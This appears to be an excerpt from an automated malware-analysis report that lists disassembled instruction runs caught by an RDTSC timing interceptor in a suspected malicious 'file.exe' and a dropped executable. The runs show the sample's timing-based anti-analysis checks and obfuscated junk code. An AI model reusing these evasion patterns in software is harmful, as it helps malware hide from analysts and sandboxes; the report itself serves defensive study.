Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47F4F second address: C47F9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10E0E4A435h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jp 00007F10E0E4A426h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 ja 00007F10E0E4A42Eh 0x0000001a push esi 0x0000001b jmp 00007F10E0E4A42Eh 0x00000020 je 00007F10E0E4A426h 0x00000026 pop esi 0x00000027 pushad 0x00000028 push edx 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47F9C second address: C47FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47FA2 second address: C47FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F10E0E4A426h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47B3C second address: C47B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52902A4 second address: 52902AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52902AA second address: 529032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 16C2256Bh 0x00000008 pushfd 0x00000009 jmp 00007F10E0B669D0h 0x0000000e sub ax, E3F8h 0x00000013 jmp 00007F10E0B669CBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e jmp 00007F10E0B669D4h 0x00000023 pushfd 0x00000024 jmp 00007F10E0B669D2h 0x00000029 or ch, FFFFFF88h 0x0000002c jmp 00007F10E0B669CBh 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 movsx edx, si 0x00000038 mov ebx, eax 0x0000003a popad 0x0000003b xchg eax, ebp 0x0000003c jmp 00007F10E0B669CAh 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529032B second address: 529032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529032F second address: 5290335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529039E second address: 52903A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52903A2 second address: 52903A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52903A8 second address: 52903D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10E0E4A437h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52903D1 second address: 52903F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, 7495FE99h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A21C second address: B5A220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A220 second address: B5A240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290480 second address: 52904A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0E4A42Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904A5 second address: 52904AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904AB second address: 52904AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290507 second address: 5290516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290516 second address: 52905A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 4546E2F9h 0x0000000e jmp 00007F10E0E4A437h 0x00000013 xor dword ptr [esp], 30DFFED1h 0x0000001a jmp 00007F10E0E4A436h 0x0000001f call 00007F11514DDEACh 0x00000024 push 759227D0h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov eax, dword ptr [esp+10h] 0x00000034 mov dword ptr [esp+10h], ebp 0x00000038 lea ebp, dword ptr [esp+10h] 0x0000003c sub esp, eax 0x0000003e push ebx 0x0000003f push esi 0x00000040 push edi 0x00000041 mov eax, dword ptr [759B0140h] 0x00000046 xor dword ptr [ebp-04h], eax 0x00000049 xor eax, ebp 0x0000004b push eax 0x0000004c mov dword ptr [ebp-18h], esp 0x0000004f push dword ptr [ebp-08h] 0x00000052 mov eax, dword ptr [ebp-04h] 0x00000055 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005c mov dword ptr [ebp-08h], eax 0x0000005f lea eax, dword ptr [ebp-10h] 0x00000062 mov dword ptr fs:[00000000h], eax 0x00000068 ret 0x00000069 pushad 0x0000006a mov edx, esi 0x0000006c mov ah, A3h 0x0000006e popad 0x0000006f and dword ptr [ebp-04h], 00000000h 0x00000073 pushad 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 mov ax, bx 0x0000007a popad 0x0000007b mov ax, bx 0x0000007e popad 0x0000007f mov edx, dword ptr [ebp+0Ch] 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F10E0E4A437h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52905A5 second address: 52905A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52905A9 second address: 52905AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52905AF second address: 52905E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b pushad 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 mov cx, D2CBh 0x00000014 popad 0x00000015 popad 0x00000016 mov al, byte ptr [edx] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F10E0B669CDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52905E5 second address: 5290611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a jmp 00007F10E0E4A42Eh 0x0000000f test al, al 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290611 second address: 5290615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290615 second address: 529061B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529061B second address: 5290621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290621 second address: 5290625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290625 second address: 52905E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F10E0B66967h 0x0000000e mov al, byte ptr [edx] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F10E0B669CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529064A second address: 5290692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edx, esi 0x0000000b jmp 00007F10E0E4A431h 0x00000010 mov edi, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F10E0E4A438h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290692 second address: 52906A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52906A1 second address: 52906B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0E4A434h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52906B9 second address: 52906E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b dec edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10E0B669D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52906E2 second address: 5290755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [edi+01h] 0x0000000d pushad 0x0000000e call 00007F10E0E4A432h 0x00000013 mov ax, 80C1h 0x00000017 pop ecx 0x00000018 jmp 00007F10E0E4A437h 0x0000001d popad 0x0000001e mov al, byte ptr [edi+01h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F10E0E4A42Bh 0x0000002a sub ecx, 2CECFB9Eh 0x00000030 jmp 00007F10E0E4A439h 0x00000035 popfd 0x00000036 movzx eax, dx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290755 second address: 529075C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 20h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529075C second address: 529077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 inc edi 0x00000008 pushad 0x00000009 mov edx, 24973562h 0x0000000e push edx 0x0000000f push eax 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 popad 0x00000013 test al, al 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F10E0E4A42Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529077F second address: 52907AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F11511EECB7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F10E0B669D5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907AB second address: 52907E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F10E0E4A42Ah 0x00000009 or cx, B988h 0x0000000e jmp 00007F10E0E4A42Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ecx, edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F10E0E4A430h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907E3 second address: 52907F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907F2 second address: 52907F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907F8 second address: 52907FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907FC second address: 5290835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b shr ecx, 02h 0x0000000e pushad 0x0000000f jmp 00007F10E0E4A434h 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 rep movsd 0x0000001a rep movsd 0x0000001c rep movsd 0x0000001e rep movsd 0x00000020 rep movsd 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, 3C45h 0x00000029 mov dl, al 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290835 second address: 529083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529083B second address: 529083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529083F second address: 5290877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a jmp 00007F10E0B669D2h 0x0000000f and ecx, 03h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F10E0B669D7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290877 second address: 529089C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529089C second address: 52908A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52908A0 second address: 52908A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52908A6 second address: 5290911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 59241847h 0x00000008 mov si, F1E3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000016 pushad 0x00000017 mov eax, edi 0x00000019 popad 0x0000001a mov eax, ebx 0x0000001c jmp 00007F10E0B669CDh 0x00000021 mov ecx, dword ptr [ebp-10h] 0x00000024 jmp 00007F10E0B669CEh 0x00000029 mov dword ptr fs:[00000000h], ecx 0x00000030 jmp 00007F10E0B669D0h 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F10E0B669D7h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290911 second address: 5290977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F10E0E4A42Ch 0x00000010 mov dh, ch 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 movsx edi, ax 0x00000018 call 00007F10E0E4A434h 0x0000001d mov ebx, eax 0x0000001f pop esi 0x00000020 popad 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F10E0E4A438h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290977 second address: 5290507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov eax, 32A7F99Bh 0x00000010 mov eax, 7C029477h 0x00000015 popad 0x00000016 retn 0008h 0x00000019 cmp dword ptr [ebp-2Ch], 10h 0x0000001d mov eax, dword ptr [ebp-40h] 0x00000020 jnc 00007F10E0B669C5h 0x00000022 push eax 0x00000023 lea edx, dword ptr [ebp-00000590h] 0x00000029 push edx 0x0000002a call esi 0x0000002c push 00000008h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F10E0B669CAh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A7E second address: 5290AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F10E0E4A42Fh 0x00000008 pop eax 0x00000009 mov dh, 9Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F10E0E4A430h 0x00000014 push eax 0x00000015 pushad 0x00000016 mov si, di 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F10E0E4A433h 0x00000021 adc ax, 094Eh 0x00000026 jmp 00007F10E0E4A439h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9DC32F second address: 9DC336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9DC336 second address: 9DC33B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9DDCB8 second address: 9DDCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0B669D9h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9DDD67 second address: 9DDDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ebx 0x00000008 xor dword ptr [esp], 0F34D884h 0x0000000f mov edi, dword ptr [ebp+122D2C2Ch] 0x00000015 push 00000003h 0x00000017 js 00007F10E0E4A433h 0x0000001d pushad 0x0000001e mov dword ptr [ebp+122D2AA7h], esi 0x00000024 mov esi, 6E84980Eh 0x00000029 popad 0x0000002a push 00000000h 0x0000002c or edx, 0840F9D7h 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F10E0E4A428h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push A99133BCh 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jno 00007F10E0E4A426h 0x0000005d rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9DDDCE second address: 9DDDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9DDDD2 second address: 9DDDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FE7E3 second address: 9FE802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0B669D9h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FE97B second address: 9FE980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF06D second address: 9FF0A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0B669D7h 0x00000011 jmp 00007F10E0B669D4h 0x00000016 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF0A4 second address: 9FF0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A434h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF216 second address: 9FF21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF35F second address: 9FF363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF363 second address: 9FF384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10E0B669CAh 0x00000012 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF4D2 second address: 9FF4F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A438h 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF656 second address: 9FF65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF7CA second address: 9FF80B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A433h 0x00000007 jne 00007F10E0E4A426h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jnp 00007F10E0E4A426h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F10E0E4A432h 0x00000020 je 00007F10E0E4A426h 0x00000026 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF93E second address: 9FF948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F10E0B669C6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF948 second address: 9FF94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF94C second address: 9FF96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F10E0B669D5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9FF96C second address: 9FF9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F10E0E4A42Ch 0x0000000d je 00007F10E0E4A426h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F10E0E4A434h 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F10E0E4A438h 0x00000024 pop edx 0x00000025 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9C0C30 second address: 9C0C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9C0C34 second address: 9C0C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9C0C38 second address: 9C0C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jnl 00007F10E0B669C6h 0x0000000f jno 00007F10E0B669C6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9C0C4E second address: 9C0C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A000C4 second address: A000D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jnc 00007F10E0B669C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A00278 second address: A0027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
